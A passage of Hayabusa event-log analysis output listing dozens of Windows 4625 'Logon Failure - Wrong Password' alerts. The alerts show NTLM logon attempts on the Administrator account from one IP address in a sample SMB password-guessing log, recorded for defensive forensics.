NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vnq3S0gEE98xfYLv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: seVfaEdAS6lEXgkG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.764 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Gz8BQAlyYXB61tx3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.805 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nkHLs6yikRWVjj9F : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.840 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0bQUcnUBCmE81G6I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.873 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BceDCcXoHJQv9pDi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.916 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GCCLt49g8wmAMEyV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.947 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pM6C8KRcxVIUsZrZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.984 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Fw5DU6l3QRVl9cWY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 37UthbuO3m4Lr7dU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: URB7Ji5pQleLtvy4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.101 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: orP9OgiBrYIKZPXE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.132 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZwvdnlIWhqoDg8On : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.181 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v6dXVbmLBpXc39ah : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.229 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8Mu7amiHAg0l7bza : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.276 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JdG6F697kAXFDx9m : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.321 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jY5AAnfQMH3VZQUa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iVep4j7jZZAOAQAj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.393 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KWWtGIQx8jBgAeoH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.427 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zn8X8gen8gX9i3QK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.476 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B9OdUM99RBHzwgVs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.518 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TJbBVm6wDrqyQmpZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tAVRBfMxIyrfsEtR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wuCIClZihRxRyjGF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yxhpEP6nnmihvkHB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.833 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J1HYmJDrWmKjj8DF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.872 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V81dIfR2SRNDk3a2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vaZpLaxB1kcCXqHP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.949 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JRhs8IoV6R6vyCdL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.988 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4wUYds3Ym3G2abrV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tmBfxm6pPLlSEsUI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VbAuqFggx0zz5iEn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.104 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8cytpVOjb4KrNaGg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BFFFt7eFzmlzbHhG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AJQBZZiNKVGXzx4A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.224 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7gyu6EyrtbyowTfC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.267 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aASpkRuPfE8Nl64n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.306 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MSI2b7LpZpWO3xJW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: avNkOq3fsGN3yYJi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.384 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Wnlgy6dW33tRk6UX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.416 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: msJ8QrqMluTeUlM9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.464 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H33NuKduMuskxL0D : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.500 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2BHjp69CD1ttbaK2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5uxByLPApvfeIhU2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6g0WOAnoGpKyEyzW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.640 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: P8MTs4Nkbm3ryqcp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0Nyd7tr3y0BHmPLM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.731 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J5KiDQOEnDf6xEPN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3MBP1buuRcBRiQTG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.804 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DXXdcg3MSqnGSvax : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Kej7zgIDCNR5tnnp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gjM8SOeQXwytB6iw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XPNATM0IL05vtbZ1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.964 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H56ci5gbBVzebS2j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6rRofLg1uxrojU7n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.048 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MAhtwTU8OttAhcxf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.093 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CwKgAR6OWbkFlxUy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.129 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lNZR4G0DVsXVg4A9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.174 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OZG99tl0RRN3cQoK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.216 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nwRzAutxa07Y1xE4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.254 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OwhvrVBSRa8RcCKe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bLBwBys2favoK7BQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.335 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3oYpj1rGcsOWNSs7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IBogtzE6No62tJB9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.416 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QQJICDi3T4LiwXZc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.465 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hnlKkfHYT0ID3BWr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.510 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gw36XaWrYp2M9CZd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j9aT76CAAER0H98I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TEOZfrP3IYmutAuq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.628 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zd54DAwwp0BJhhaZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.665 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AR6Gc128RlPtwcPl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.713 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cpjS1YZy2sSRqzI3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.756 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EKeate89Gw1oEp0U : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tBhApsBYa65Hxr0L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.894 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ITv5RS3WHhWe0Hez : IP Address: 192.168.198.149 : AuthPackage: 